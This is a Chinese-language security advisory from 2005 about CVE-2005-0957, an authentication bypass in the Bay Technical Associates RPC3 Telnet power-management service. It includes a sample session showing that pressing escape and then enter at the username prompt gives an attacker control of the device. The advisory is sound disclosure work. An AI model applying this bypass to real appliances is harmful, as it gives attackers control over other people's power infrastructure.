Bay Technical Associates RPC3 Telnet访问认证绕过漏洞
发布日期:2005-03-31
更新日期:2005-03-31
受影响系统:Bay Technical Associates RPC3 Telnet F 3.05
不受影响系统:Bay Technical Associates RPC3 Telnet F 5.10.4
描述:
BUGTRAQ ID:
12955
CVE(CAN) ID:
CVE-2005-0957
Bay Technical Associates RPC3 Telnet是一种用于电源设备管理的远程服务。
RPC3 Telnet服务处理用户认证时存在设计错误,远程攻击者可能利用此漏洞绕过访问认证完全控制设备。
在RPC3 Telnet服务的登录提示符下,用户只要输入“[escape key] [enter]”序列即可中断认证过程直接获取对设备的访问。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
RPC-3 Telnet Host
Revision F 3.05, (C) 1998
Bay Technical Associates
Unit ID: RPC3
Enter username> [escape key] [enter]
Login successful.
Available RPC3 Outlets
For command summary, enter HELP
Circuit Breaker: On
Selection Outlet Outlet Power
Number Name Number Status
RPC3> [attacker now has control of the appliance]
建议:
厂商补丁:
Bay Technical Associates
------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.baytechdcd.com/浏览次数:2543
严重程度:0(网友投票)